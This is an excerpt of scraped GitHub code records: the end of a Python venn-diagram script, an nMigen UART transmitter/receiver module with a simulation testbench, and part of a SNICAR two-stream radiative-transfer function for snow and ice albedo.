converters=cvt)\n firstN = 10000\n\n sl['spots'] = [0] * len(sl.index)\n sl['avgLength'] = [0] * len(sl.index)\n for i in range(len(sl)):\n sid = sl['SampleID'][i]\n fq = ''\n if sl['paired'][i]:\n r1, r2 = sl['r1'][i], sl['r2'][i]\n fq = r1\n else:\n fq = sl['r0'][i]\n\n nrcd = 0\n L = []\n for rec in 
iter_fastq(fq):\n if not rec:\n break\n nrcd += 1\n if nrcd <= firstN:\n L.append(len(rec))\n\n avgLength = SummaryStats(L).mean\n if sl['paired'][i]:\n avgLength = avgLength * 2\n\n print(\"\\t\".join(str(x) for x in (sid, nrcd, avgLength)))\n sl.at[i, 'spots'] = nrcd\n sl.at[i, 'avgLength'] = avgLength\n\n sl.to_csv(args.fo, sep=\"\\t\", header=True, index=False)\n\ndef main():\n import argparse\n ps = argparse.ArgumentParser(\n formatter_class = argparse.ArgumentDefaultsHelpFormatter,\n description = '3-way venn-diagram'\n )\n sp = ps.add_subparsers(title = 'available commands', dest = 'command')\n\n sp1 = sp.add_parser('coord', help='compute venn3 coordinates',\n formatter_class = argparse.ArgumentDefaultsHelpFormatter)\n sp1.add_argument('fi', help = 'input file containing sets')\n sp1.add_argument('fo1', help = 'output circle coordinates')\n sp1.add_argument('fo2', help = 'output label coordinates')\n sp1.set_defaults(func = venn3_coord)\n\n args = ps.parse_args()\n if args.command:\n args.func(args)\n else:\n print('Error: need to specify a sub command\\n')\n parser.print_help()\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"orionzhou/maize","sub_path":"apps/venn3.py","file_name":"venn3.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"23495500390","text":"#!/usr/bin/env nmigen\n\nfrom nmigen import *\n\nfrom nmigen_lib.util import delay\nfrom nmigen_lib.util.main import Main\n\n\nclass UART(Elaboratable):\n\n def __init__(self, divisor, data_bits=8):\n self.divisor = divisor\n self.data_bits = data_bits\n\n self.tx_data = Signal(data_bits)\n self.tx_pin = Signal()\n self.tx_trg = Signal()\n self.tx_rdy = Signal()\n\n self.rx_pin = Signal(reset=1)\n self.rx_rdy = Signal()\n self.rx_err = Signal()\n # self.rx_ovf = Signal() # XXX not used yet\n self.rx_data = Signal(data_bits)\n\n self.ports = (\n self.tx_data,\n self.tx_trg,\n self.tx_rdy,\n self.tx_pin,\n\n self.rx_pin,\n self.rx_rdy,\n self.rx_err,\n # self.rx_ovf,\n self.rx_data,\n )\n\n def elaborate(self, platform):\n m = Module()\n tx = UARTTx(divisor=self.divisor, data_bits=self.data_bits)\n rx = UARTRx(divisor=self.divisor, data_bits=self.data_bits)\n m.submodules.tx = tx\n m.submodules.rx = rx\n m.d.comb += [\n tx.tx_data.eq(self.tx_data),\n tx.tx_trg.eq(self.tx_trg),\n self.tx_rdy.eq(tx.tx_rdy),\n self.tx_pin.eq(tx.tx_pin),\n\n rx.rx_pin.eq(self.rx_pin),\n self.rx_rdy.eq(rx.rx_rdy),\n self.rx_err.eq(rx.rx_err),\n # self.rx_ovf.eq(rx.rx_ovf),\n self.rx_data.eq(rx.rx_data),\n ]\n return m\n\n\nclass UARTTx(Elaboratable):\n\n def __init__(self, divisor, data_bits=8):\n self.divisor = divisor\n self.data_bits = data_bits\n self.tx_data = Signal(data_bits)\n self.tx_trg = Signal()\n self.tx_rdy = Signal()\n self.tx_pin = Signal(reset=1)\n self.ports = (\n self.tx_data,\n self.tx_trg,\n self.tx_pin,\n self.tx_rdy,\n )\n\n def elaborate(self, platform):\n tx_data = Signal(self.data_bits)\n tx_fast_count = Signal(range(-1, self.divisor - 1), reset=-1)\n tx_bit_count = Signal(range(-1, self.data_bits))\n\n m = Module()\n\n with m.If(tx_fast_count[-1]):\n with m.FSM():\n with m.State('IDLE'):\n with m.If(self.tx_trg):\n m.d.sync += [\n tx_data.eq(self.tx_data),\n self.tx_rdy.eq(False),\n self.tx_pin.eq(0), # start bit\n tx_bit_count.eq(self.data_bits - 1),\n tx_fast_count.eq(self.divisor - 2),\n ]\n m.next = 'DATA'\n with m.Else():\n m.d.sync += [\n self.tx_rdy.eq(True),\n tx_fast_count.eq(-1),\n ]\n m.next = 'IDLE'\n 
with m.State('DATA'):\n with m.If(tx_bit_count[-1]):\n m.d.sync += [\n self.tx_rdy.eq(False),\n self.tx_pin.eq(1), # stop bit\n tx_fast_count.eq(self.divisor - 2),\n ]\n m.next = 'STOP'\n with m.Else():\n m.d.sync += [\n self.tx_pin.eq(tx_data[0]),\n tx_data.eq(tx_data[1:]),\n tx_bit_count.eq(tx_bit_count - 1),\n tx_fast_count.eq(self.divisor - 2),\n ]\n m.next = 'DATA'\n with m.State('STOP'):\n m.d.sync += [\n # self.tx_pin.eq(1),\n self.tx_rdy.eq(True),\n # tx_fast_count.eq(self.divisor - 2),\n tx_fast_count.eq(-1),\n ]\n m.next = 'IDLE'\n\n with m.Else():\n m.d.sync += [\n tx_fast_count.eq(tx_fast_count - 1),\n ]\n return m\n\n\nclass UARTRx(Elaboratable):\n\n def __init__(self, divisor, data_bits=8):\n \"\"\"Assume no parity, 1 stop bit\"\"\"\n self.divisor = divisor\n self.data_bits = data_bits\n self.rx_pin = Signal(reset=1)\n self.rx_rdy = Signal()\n self.rx_err = Signal()\n self.dbg = Signal(4) # XXX\n # self.rx_ovf = Signal() # XXX not used yet\n self.rx_data = Signal(data_bits)\n self.ports = (self.rx_pin,\n self.rx_rdy,\n self.rx_err,\n # self.rx_ovf,\n self.rx_data,\n self.dbg, # XXX\n )\n\n def elaborate(self, platform):\n # N.B. both counters (rx_counter, rx_bits) count from n-2 to -1.\n rx_max = self.divisor - 2\n rx_counter = Signal(range(-1, rx_max + 1), reset=~0)\n rx_data = Signal(self.data_bits)\n rx_bits = Signal(range(-1, self.data_bits - 1))\n rx_resync_max = 10 * self.divisor - 2\n rx_resync_counter = Signal(range(-1, rx_resync_max + 1))\n rx_pin = Signal(reset=1)\n rx_pin1 = Signal(reset=1)\n\n m = Module()\n m.d.comb += self.dbg[0].eq(rx_counter[-1]) # XXX\n m.d.sync += [\n rx_pin.eq(rx_pin1),\n rx_pin1.eq(self.rx_pin),\n ]\n with m.If(rx_counter[-1]):\n with m.FSM():\n with m.State('IDLE'):\n with m.If(~rx_pin):\n m.d.sync += [\n rx_data.eq(0),\n self.rx_rdy.eq(False),\n self.rx_err.eq(False),\n rx_counter.eq(self.divisor // 2 - 2),\n ]\n m.next = 'START'\n with m.Else():\n m.d.sync += [\n self.rx_rdy.eq(False),\n self.rx_err.eq(False),\n rx_counter.eq(-1),\n ]\n m.next = 'IDLE'\n with m.State('START'):\n with m.If(rx_pin):\n m.d.sync += [\n self.rx_err.eq(True),\n rx_counter.eq(-1),\n rx_resync_counter.eq(rx_resync_max),\n ]\n m.next = 'RESYNC'\n with m.Else():\n m.d.sync += [\n rx_bits.eq(self.data_bits - 2),\n rx_counter.eq(self.divisor - 2),\n ]\n m.next = 'DATA'\n with m.State('DATA'):\n m.d.sync += [\n rx_data.eq(Cat(rx_data[1:], rx_pin)),\n rx_counter.eq(self.divisor - 2),\n ]\n with m.If(rx_bits[-1]):\n m.next = 'STOP'\n with m.Else():\n m.d.sync += [\n rx_bits.eq(rx_bits - 1),\n ]\n m.next = 'DATA'\n with m.State('STOP'):\n with m.If(~rx_pin):\n m.d.sync += [\n self.rx_err.eq(True),\n rx_resync_counter.eq(rx_resync_max),\n rx_counter.eq(-1),\n ]\n m.next = 'RESYNC'\n with m.Else():\n m.d.sync += [\n self.rx_data.eq(rx_data),\n self.rx_rdy.eq(True),\n ]\n m.next = 'IDLE'\n\n with m.State('RESYNC'):\n m.d.sync += [\n self.rx_err.eq(False),\n rx_counter.eq(-1),\n ]\n with m.If(rx_pin):\n with m.If(rx_resync_counter[-1]):\n m.next = 'IDLE'\n with m.Else():\n m.d.sync += [\n rx_resync_counter.eq(rx_resync_counter - 1),\n ]\n m.next = 'RESYNC'\n with m.Else():\n m.d.sync += [\n rx_resync_counter.eq(rx_resync_max),\n ]\n m.next = 'RESYNC'\n with m.Else():\n m.d.sync += [\n rx_counter.eq(rx_counter - 1),\n self.rx_rdy.eq(False),\n self.rx_err.eq(False),\n ]\n return m\n\n\nif __name__ == '__main__':\n divisor = 20\n design = UART(divisor=divisor)\n\n # Workaround nmigen issue #280\n m = Module()\n m.submodules.design = design\n tx_data = Signal(8)\n tx_trg = 
Signal()\n m.d.comb += design.tx_data.eq(tx_data)\n m.d.comb += design.tx_trg.eq(tx_trg)\n\n #280 with Main(design).sim as sim:\n with Main(m).sim as sim:\n\n @sim.sync_process\n def send_char():\n char = 'Q'\n yield from delay(2)\n #280 yield design.tx_data.eq(ord(char))\n #280 yield design.tx_trg.eq(True)\n yield tx_data.eq(ord(char))\n yield tx_trg.eq(True)\n yield\n #280 yield design.tx_trg.eq(False)\n yield tx_trg.eq(False)\n yield from delay(10 * divisor + 4)\n\n @sim.sync_process\n def recv_char():\n char = 'Q'\n char = chr(0x95) # Test high bit\n yield design.rx_pin.eq(1)\n yield from delay(3)\n for i in range(2):\n # Start bit\n yield design.rx_pin.eq(0)\n yield from delay(divisor)\n # Data bits\n for i in range(8):\n yield design.rx_pin.eq(ord(char) >> i & 1)\n yield from delay(divisor)\n # Stop bit\n yield design.rx_pin.eq(1)\n yield from delay(divisor)\n yield from delay(2)\n","repo_name":"kbob/icebreaker-synth","sub_path":"submodules/nmigen-examples/nmigen_lib/uart.py","file_name":"uart.py","file_ext":"py","file_size_in_byte":10485,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"78"} +{"seq_id":"29197617060","text":"def snicar8d_GO(DIRECT, APRX_TYP, DELTA, coszen, R_sfc, dz, rho_snw, side_length, depth, nbr_lyr, nbr_aer,\nmss_cnc_soot1, mss_cnc_soot2, mss_cnc_dust1, mss_cnc_dust2, \nmss_cnc_dust3, mss_cnc_dust4, mss_cnc_ash1, mss_cnc_GRISdust1, \nmss_cnc_GRISdust2, mss_cnc_GRISdust3, mss_cnc_GRISdustP1, \nmss_cnc_GRISdustP2, mss_cnc_GRISdustP3, mss_cnc_snw_alg, mss_cnc_glacier_algae1, \nmss_cnc_glacier_algae2, FILE_soot1, FILE_soot2, FILE_dust1, FILE_dust2, FILE_dust3, FILE_dust4, \nFILE_ash1, FILE_GRISdust1, FILE_GRISdust2, FILE_GRISdust3, FILE_GRISdustP1, FILE_GRISdustP2, \nFILE_GRISdustP3, FILE_snw_alg, FILE_glacier_algae1, FILE_glacier_algae2):\n\n\n import numpy as np\n import xarray as xr\n import matplotlib.pyplot as plt\n\n # set working directory (location of netcdf library)\n dir_base = \"/home/joe/Code/SNICAR_NeuralNet/\"\n dir_alg = \"Data/Algal_Optical_Props/\"\n dir_GO_files = \"Data/GO_files/\"\n\n # retrieve wavelength from arbitrary choice of netcdf file\n temp = xr.open_dataset(str(dir_base+dir_GO_files+\"ice_geom_5000_5000.nc\"))\n wvl = np.array(temp['wvl'].values)\n wvl = wvl*1e6\n nbr_wvl = len(wvl)\n\n # set reflectance of underlying surface\n R_sfc = [R_sfc for _ in range(nbr_wvl)]\n R_sfc = np.array(R_sfc)\n\n # Incoming Irradiance\n # calculate mu_not\n # mu_not = np.cos((slr_znt / 360) * 2 * np.pi() # convert radians if required\n mu_not = coszen\n flx_slr = []\n\n if DIRECT:\n\n with open(str(dir_base + dir_GO_files + \"mlw_sfc_flx_frc_clr.txt\")) as file:\n for line in file:\n line = float(line.rstrip(\"\\n\"))\n flx_slr.append(line)\n flx_slr = np.array(flx_slr)\n flx_slr[flx_slr==0]=1e-30\n Fs = flx_slr / (mu_not * np.pi)\n\n Fd = np.zeros(nbr_wvl)\n\n else:\n\n with open(str(dir_base + dir_GO_files + \"mlw_sfc_flx_frc_cld.txt\")) as file:\n for line in file:\n line = float(line.rstrip(\"\\n\"))\n flx_slr.append(line)\n \n flx_slr = np.array(flx_slr)\n flx_slr[flx_slr==0]=1e-30\n\n Fd = [flx_slr[i]/mu_not*np.pi for i in range(nbr_wvl)]\n Fs = np.zeros(nbr_wvl)\n\n # Read in ice optical properties\n # set string stubs for reading in ice optical files\n\n fl_stb1 = \"ice_geom_\"\n fl_stb2 = \".nc\"\n\n #set up empty arrays\n SSA_snw = np.empty([nbr_lyr, nbr_wvl])\n MAC_snw = np.empty([nbr_lyr, nbr_wvl])\n g_snw = np.empty([nbr_lyr, nbr_wvl])\n\n for i in np.arange(0,nbr_lyr,1):\n\n if (side_length[i] 
== 0) | (depth[i] == 0):\n\n print(\"ERROR: ICE GRAIN LENGTH AND/OR DEPTH SET TO ZERO\")\n\n else:\n\n s1 = str(side_length[i])\n s2 = str(depth[i])\n FILE_ice = str(dir_base+dir_GO_files+fl_stb1+s1+\"_\"+s2+fl_stb2)\n \n\n # read in single scattering albedo, MAC and g for ice crystals in each layer\n with xr.open_dataset(FILE_ice) as temp:\n SSA = temp['ss_alb'].values\n SSA_snw[i,:] = SSA\n\n ext_cff_mss = temp['ext_cff_mss'].values\n MAC_snw[i,:] = ext_cff_mss\n\n asm_prm = temp['asm_prm'].values\n g_snw[i,:] = asm_prm\n\n # open netcdf files\n FILE_soot1 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_soot1))\n FILE_soot2 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_soot2))\n FILE_dust1 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_dust1))\n FILE_dust2 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_dust2))\n FILE_dust3 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_dust3))\n FILE_dust4 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_dust4))\n FILE_ash1 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_ash1))\n FILE_GRISdust1 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_GRISdust1))\n FILE_GRISdust2 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_GRISdust2))\n FILE_GRISdust3 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_GRISdust3))\n FILE_GRISdustP1 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_GRISdustP1))\n FILE_GRISdustP2 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_GRISdustP2))\n FILE_GRISdustP3 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_GRISdustP3))\n FILE_snw_alg = xr.open_dataset(FILE_snw_alg)\n FILE_glacier_algae1 = xr.open_dataset(FILE_glacier_algae1)\n FILE_glacier_algae2 = xr.open_dataset(FILE_glacier_algae2)\n\n # read in aerosol optical properties\n SSAaer = np.zeros([nbr_aer,nbr_wvl])\n\n SSAaer[0,:] = FILE_soot1['ss_alb'].values\n SSAaer[1,:] = FILE_soot2['ss_alb'].values\n SSAaer[2,:] = FILE_dust1['ss_alb'].values\n SSAaer[3,:] = FILE_dust2['ss_alb'].values\n SSAaer[4,:] = FILE_dust3['ss_alb'].values\n SSAaer[5,:] = FILE_dust4['ss_alb'].values\n SSAaer[6,:] = FILE_ash1['ss_alb'].values\n SSAaer[7,:] = FILE_GRISdust1['ss_alb'].values\n SSAaer[8,:] = FILE_GRISdust2['ss_alb'].values\n SSAaer[9,:] = FILE_GRISdust3['ss_alb'].values\n SSAaer[10,:] = FILE_GRISdustP1['ss_alb'].values\n SSAaer[11,:] = FILE_GRISdustP2['ss_alb'].values\n SSAaer[12,:] = FILE_GRISdustP3['ss_alb'].values\n SSAaer[13,:] = FILE_snw_alg['ss_alb'].values\n SSAaer[14,:] = FILE_glacier_algae1['ss_alb'].values\n SSAaer[15,:] = FILE_glacier_algae2['ss_alb'].values\n\n MACaer = np.zeros([nbr_aer, nbr_wvl])\n\n MACaer[0,:] = FILE_soot1['ext_cff_mss'].values\n MACaer[1,:] = FILE_soot2['ext_cff_mss'].values\n MACaer[2,:] = FILE_dust1['ext_cff_mss'].values\n MACaer[3,:] = FILE_dust2['ext_cff_mss'].values\n MACaer[4,:] = FILE_dust3['ext_cff_mss'].values\n MACaer[5,:] = FILE_dust4['ext_cff_mss'].values\n MACaer[6,:] = FILE_ash1['ext_cff_mss'].values\n MACaer[7,:] = FILE_GRISdust1['ext_cff_mss'].values\n MACaer[8,:] = FILE_GRISdust2['ext_cff_mss'].values\n MACaer[9,:] = FILE_GRISdust3['ext_cff_mss'].values\n MACaer[10,:] = FILE_GRISdustP1['ext_cff_mss'].values\n MACaer[11,:] = FILE_GRISdustP2['ext_cff_mss'].values\n MACaer[12,:] = FILE_GRISdustP3['ext_cff_mss'].values\n MACaer[13,:] = FILE_snw_alg['ext_cff_mss'].values\n MACaer[14,:] = FILE_glacier_algae1['ext_cff_mss'].values\n MACaer[15,:] = FILE_glacier_algae2['ext_cff_mss'].values\n\n Gaer = np.zeros([nbr_aer,nbr_wvl])\n\n Gaer[0,:] = FILE_soot1['asm_prm'].values\n Gaer[1,:] = 
FILE_soot2['asm_prm'].values\n Gaer[2,:] = FILE_dust1['asm_prm'].values\n Gaer[3,:] = FILE_dust2['asm_prm'].values\n Gaer[4,:] = FILE_dust3['asm_prm'].values\n Gaer[5,:] = FILE_dust4['asm_prm'].values\n Gaer[6,:] = FILE_ash1['asm_prm'].values\n Gaer[7,:] = FILE_GRISdust1['asm_prm'].values\n Gaer[8,:] = FILE_GRISdust2['asm_prm'].values\n Gaer[9,:] = FILE_GRISdust3['asm_prm'].values\n Gaer[10,:] = FILE_GRISdustP1['asm_prm'].values\n Gaer[11,:] = FILE_GRISdustP2['asm_prm'].values\n Gaer[12,:] = FILE_GRISdustP3['asm_prm'].values\n Gaer[13,:] = FILE_snw_alg['asm_prm'].values\n Gaer[14,:] = FILE_glacier_algae1['asm_prm'].values\n Gaer[15,:] = FILE_glacier_algae2['asm_prm'].values\n\n\n # load mass concentrations per layer into numpy array (one row per layer, one column per umpurity)\n # and convert to kg/kg unit\n\n MSSaer = np.zeros([nbr_lyr, nbr_aer])\n MSSaer[0:nbr_lyr,0] = mss_cnc_soot1\n MSSaer[0:nbr_lyr,1] = mss_cnc_soot2\n MSSaer[0:nbr_lyr,2] = mss_cnc_dust1\n MSSaer[0:nbr_lyr,3] = mss_cnc_dust2\n MSSaer[0:nbr_lyr,4] = mss_cnc_dust3\n MSSaer[0:nbr_lyr,5] = mss_cnc_dust4\n MSSaer[0:nbr_lyr,6] = mss_cnc_ash1\n MSSaer[0:nbr_lyr,7] = mss_cnc_GRISdust1\n MSSaer[0:nbr_lyr,8] = mss_cnc_GRISdust2\n MSSaer[0:nbr_lyr,9] = mss_cnc_GRISdust3\n MSSaer[0:nbr_lyr,10] = mss_cnc_GRISdustP1\n MSSaer[0:nbr_lyr,11] = mss_cnc_GRISdustP2\n MSSaer[0:nbr_lyr,12] = mss_cnc_GRISdustP3\n MSSaer[0:nbr_lyr,13] = mss_cnc_snw_alg\n MSSaer[0:nbr_lyr,14] = mss_cnc_glacier_algae1\n MSSaer[0:nbr_lyr,15] = mss_cnc_glacier_algae2\n\n MSSaer = MSSaer*1e-9\n\n\n #####################################\n # Begin solving Radiative Transfer\n #####################################\n\n \"\"\"\n #1. Calculate effective tau (optical depth), SSA (single scattering albedo) and \n # g (assymetry parameter) for the ice + impurities mixture.\n\n # SSA and g for the individual components has been calculated using Mie theory and\n # stored in a netcdf file. 
Here, these values are combined to give an overall\n # SSA and g for the ice + impurity mixture\n \n \"\"\"\n\n # initialize arrays\n g_sum = np.zeros([nbr_lyr, nbr_wvl])\n SSA_sum = np.zeros([nbr_lyr, nbr_aer, nbr_wvl])\n tau = np.zeros([nbr_lyr, nbr_wvl])\n SSA = np.zeros([nbr_lyr, nbr_wvl])\n g = np.zeros([nbr_lyr, nbr_wvl])\n L_aer = np.zeros([nbr_lyr, nbr_aer, nbr_wvl])\n tau_aer = np.zeros([nbr_lyr, nbr_aer, nbr_wvl])\n tau_sum = np.zeros([nbr_lyr, nbr_wvl])\n SSA_sum = np.zeros([nbr_lyr, nbr_wvl])\n L_snw = np.zeros(nbr_lyr)\n tau_snw = np.zeros([nbr_lyr,nbr_wvl])\n direct = np.zeros([nbr_lyr,nbr_wvl])\n F_net = np.zeros([nbr_lyr, nbr_wvl])\n F_btm_net = np.zeros([1,nbr_wvl])\n F_top_net = np.zeros([1,nbr_wvl])\n intensity = np.zeros([nbr_lyr, nbr_wvl])\n F_top_pls = np.zeros([1,nbr_wvl])\n F_up = np.zeros([nbr_lyr,nbr_wvl])\n F_down = np.zeros([nbr_lyr,nbr_wvl])\n F_net2 = np.zeros([nbr_lyr, nbr_wvl])\n intensity2 = np.zeros([nbr_lyr, nbr_wvl])\n intensity2_top = np.zeros(nbr_wvl)\n F_abs = np.zeros([nbr_lyr, nbr_wvl])\n abs_vis = np.zeros(nbr_lyr)\n abs_nir = np.zeros(nbr_lyr)\n\n\n # for each layer, the layer mass (L) is density * layer thickness\n # for each layer the optical depth is the layer mass * the mass extinction coefficient\n # first for the ice in each layer\n for i in range(nbr_lyr):\n L_snw[i] = rho_snw[i] * dz[i]\n tau_snw[i, :] = L_snw[i] * MAC_snw[i, :]\n\n # then for the LAPs in each layer\n for i in range(nbr_lyr):\n for j in range(nbr_aer):\n L_aer[i, j, :] = np.multiply(L_snw[i], MSSaer[i, j])\n tau_aer[i, j, :] = np.multiply(L_aer[i, j, :], MACaer[j, :])\n\n tau_sum = tau_sum + tau_aer[i, j, :]\n SSA_sum = SSA_sum + (tau_aer[i, j, :] * SSAaer[j, :])\n g_sum = g_sum + (tau_aer[i, j, :] * SSAaer[j, :] * Gaer[j, :])\n\n # finally, for each layer calculate the effective SSA, tau and g for the snow+LAP\n for i in range(nbr_lyr):\n tau[i,:] = tau_sum[i,:] + tau_snw[i,:]\n SSA[i,:] = (1/tau[i,:]) * (SSA_sum[i,:] + SSA_snw[i,:] * tau_snw[i,:])\n g[i, :] = (1 / (tau[i, :] * (SSA[i, :]))) * (g_sum[i,:] + (g_snw[i, :] * SSA_snw[i, :] * tau_snw[i, :]))\n\n\n ############################################\n # PERFORM DELTA TRANSFORMATION IF REQUIRED\n ############################################\n # The star represents the delta transformed quantity\n # if no delat transformation is applied, the starred quantity\n # is equal to the unstarred quantity\n\n if DELTA:\n g_star = g/(1+g)\n SSA_star = ((1-(g**2))*SSA)/(1-(SSA*(g**2)))\n tau_star = (1-(SSA*(g**2)))*tau\n\n else:\n g_star = g\n SSA_star = SSA\n tau_star = tau\n\n\n # CALCULATE TOTAL OPTICAL DEPTH OF ENTIRE COLUMN\n # i.e. tau_clm = total optical depth from upper boundary \n # to upper boundary of layer n. This is therefore a cumulative\n # quantity - subsequently lower layers contain the sum of the\n # # optical depth of all overlying layers\n\n tau_clm = np.zeros([nbr_lyr,nbr_wvl])\n for i in np.arange(1,nbr_lyr,1):\n #start loop from 2nd layer, i.e. index = 1\n tau_clm[i,:] = tau_clm[i-1,:]+tau_star[i-1,:]\n\n # SET BOUNDARY CONDITION: BOTTOM BOUNDARY\n # calculate radiation reflected skywards by underlying surface (i.e. 
lower model boundary)\n # remainder is lost\n\n S_sfc = R_sfc * mu_not * np.exp(-(tau_clm[nbr_lyr-1,:] + tau_star[nbr_lyr-1,:])/mu_not)*np.pi * Fs\n\n ######################################################\n # Apply Two-Stream Approximation (Toon et al, table 1)\n ######################################################\n \"\"\"\n Three 2-stream approximations are available: Eddington,\n Quadrature and hemispheric mean. The equations for each\n approximation are provided in Toon et al. (1989) Table 1.\n\n The hemispheric mean scheme is derived by assuming that the\n phase function is equal to 1 + g in the forward scattering \n hemisphere and to 1 - g in the backward scattering hemisphere. \n The asymmetry parameter is g. The hemispheric mean is only\n useful for infrared wavelengths\n\n \"\"\"\n\n if APRX_TYP == 1:\n #apply Eddington approximation\n gamma1 = (7-(SSA_star * (4+(3*g_star))))/4\n gamma2 = -(1-(SSA_star*(4-(3*g_star))))/4\n gamma3 = (2-(3*g_star*mu_not))/4\n gamma4 = 1-gamma3\n mu_one = 0.5\n\n elif APRX_TYP==2:\n #apply quadrature approximation\n gamma1 = np.sqrt(3)*(2-(SSA_star*(1+g_star)))/2\n gamma2 = SSA_star * np.sqrt(3)*(1-g_star)/2\n gamma3 = (1-(np.sqrt(3)*g_star*mu_not))/2\n gamma4 = 1-gamma3\n mu_one = 1/np.sqrt(3)\n\n elif APRX_TYP==3:\n #apply hemispheric mean approximation\n gamma1 = 2 - (SSA_star*(1+g_star))\n gamma2 = SSA_star*(1-g_star)\n gamma3 = (1-(np.sqrt(3) * g_star*mu_not))/2\n gamma4 = 1-gamma3\n mu_one = 0.5\n\n\n # Toon et al equation 21 and 22\n # Note that the values of lam and GAMMA depend upon gamma1 and gamma2, which\n # vary depending upon the two-stream approximation used\n # variable \"lambda\" renamed \"lam\" to avoid confusion with lambda function\n lam = np.sqrt(abs((gamma1**2)-(gamma2**2)))\n GAMMA = gamma2/(gamma1+lam)\n\n # calculate coefficients required for tridiagonal matrix calculation\n # (Toon et al Equation 44)\n e1 = 1+(GAMMA*np.exp(-lam*tau_star))\n e2 = 1-(GAMMA*np.exp(-lam*tau_star))\n e3 = GAMMA+np.exp(-lam*tau_star)\n e4 = GAMMA-np.exp(-lam*tau_star)\n\n\n ######################################\n # Calculate C-functions\n ######################################\n\n # C is the direct beam flux calculated at the top and bottom of each layer, i,\n # see Toon equations 23 and 24\n\n \"\"\" N.B. 
consider adding in stability check here as per Flanner's Matlab code \"\"\"\n\n C_pls_btm = np.zeros([nbr_lyr,nbr_wvl])\n C_mns_btm = np.zeros([nbr_lyr,nbr_wvl])\n C_pls_top = np.zeros([nbr_lyr, nbr_wvl])\n C_mns_top = np.zeros([nbr_lyr, nbr_wvl])\n\n for i in np.arange(0,nbr_lyr,1):\n\n if np.sum(Fs) > 0.0:\n\n C_pls_btm[i,:] = (SSA_star[i,:]*np.pi*Fs*np.exp(-(tau_clm[i,:]+tau_star[i,:])/mu_not)*\n (((gamma1[i,:]-(1/mu_not))*gamma3[i,:])+(gamma4[i,:]*gamma2[i,:])))\\\n /((lam[i,:]**2)-(1/(mu_not**2)))\n\n C_mns_btm[i,:] = (SSA_star[i,:]*np.pi*Fs*\n np.exp(-(tau_clm[i,:]+tau_star[i,:])/mu_not) * (((gamma1[i,:]+(1/mu_not))*gamma4[i,:])+\n (gamma2[i,:]*gamma3[i,:])))/((lam[i,:]**2)-(1/mu_not**2))\n\n C_pls_top[i,:] = (SSA_star[i,:] * np.pi * Fs * np.exp(-tau_clm[i,:]/mu_not)* ((gamma1[i,:] - (1/mu_not))\n * gamma3[i,:] + (gamma4[i,:]*gamma2[i,:])))/((lam[1,:]**2)-(1/mu_not**2))\n\n C_mns_top[i,:] = (SSA_star[i,:] * np.pi * Fs * np.exp(-tau_clm[i,:]/mu_not) * ((gamma1[i,:]+(1/mu_not))\n * gamma4[i,:] + (gamma2[i,:]*gamma3[i,:])))/((lam[i,:]**2)-(1/mu_not**2))\n\n else:\n # no direct-beam flux:\n C_pls_btm[i,:] = 0\n C_mns_btm[i,:] = 0\n C_pls_top[i,:] = 0\n C_mns_top[i,:] = 0\n\n\n # Toon equations 41-43.\n # Boundary values for i=1 and i=2nbr_lyr, specifics for i=odd and i=even\n # Set up lists\n A = np.zeros([2*nbr_lyr,nbr_wvl])\n B = np.zeros([2*nbr_lyr,nbr_wvl])\n D = np.zeros([2*nbr_lyr,nbr_wvl])\n E = np.zeros([2*nbr_lyr,nbr_wvl])\n\n ###########################################\n # Initialize tridiagonal matrix solution\n ###########################################\n\n # expanding the number of layers to 2*nbr_lyr so that fluxes at upper and lower\n # layer boundaries can be resolved. This section was confusing to code - for each layer\n # index (n) a second pair of indices (2 x i) are required. Different solutions are\n # applied depending upon whether i is even or odd. To translate the indexing for this \n # from FORTRAN/MATLAB into Python, it was necessary to assert n = (i/2)-1 for even layers\n # and n = floor(i/2) for odd layers, with specific rules for the boundaries i = 0 and \n # i = nbr_lyrs-1 (i.e. top surface and bottom surface).\n\n for i in np.arange(0,2*nbr_lyr,1):\n \n #TOP LAYER \n if i==0:\n A[0,:] = 0.0\n B[0,:] = e1[0,:]\n D[0,:] = -e2[0,:]\n E[0,:] = Fd-C_mns_top[0,:]\n\n # BOTTOM LAYER\n elif i== 2*nbr_lyr-1:\n A[i,:] = e1[nbr_lyr-1,:]-(R_sfc * e3[nbr_lyr-1,:])\n B[i,:] = e2[nbr_lyr-1,:]-(R_sfc * e4[nbr_lyr-1,:])\n D[i,:] = 0.0\n E[i,:] = S_sfc[:] - C_pls_btm[nbr_lyr-1,:] + (R_sfc * C_mns_btm[nbr_lyr-1,:])\n\n\n # EVEN NUMBERED LAYERS\n elif i%2==0:\n n = int(i/2)-1\n A[i,:] = (e2[n,:] * e3[n,:])-(e4[n,:] * e1[n,:])\n B[i,:] = (e1[n,:] * e1[n+1,:])-(e3[n,:] * e3[n+1,:])\n D[i,:] = (e3[n,:] * e4[n+1,:])-(e1[n,:] * e2[n+1,:])\n E[i,:] = (e3[n,:] * (C_pls_top[n+1,:] - C_pls_btm[n,:])) + (e1[n,:] * (C_mns_btm[n,:] - C_mns_top[n+1,:]))\n\n # ODD NUMBERED LAYERS\n elif (i%2 ==1) and (i < 2*nbr_lyr-1):\n\n n = int(np.floor(i/2))\n A[i,:] = (e2[n+1,:] * e1[n,:])-(e3[n,:] * e4[n+1,:])\n B[i,:] = (e2[n,:] * e2[n+1,:])-(e4[n,:] * e4[n+1,:])\n D[i,:] = (e1[n+1,:] * e4[n+1,:])-(e2[n+1,:] * e3[n+1,:])\n E[i,:] = (e2[n+1,:] * (C_pls_top[n+1,:] - C_pls_btm[n,:])) + (e4[n+1,:] * (C_mns_top[n+1,:] - C_mns_btm[n,:]))\n\n # Now the actual tridiagonal matrix solving. Simply 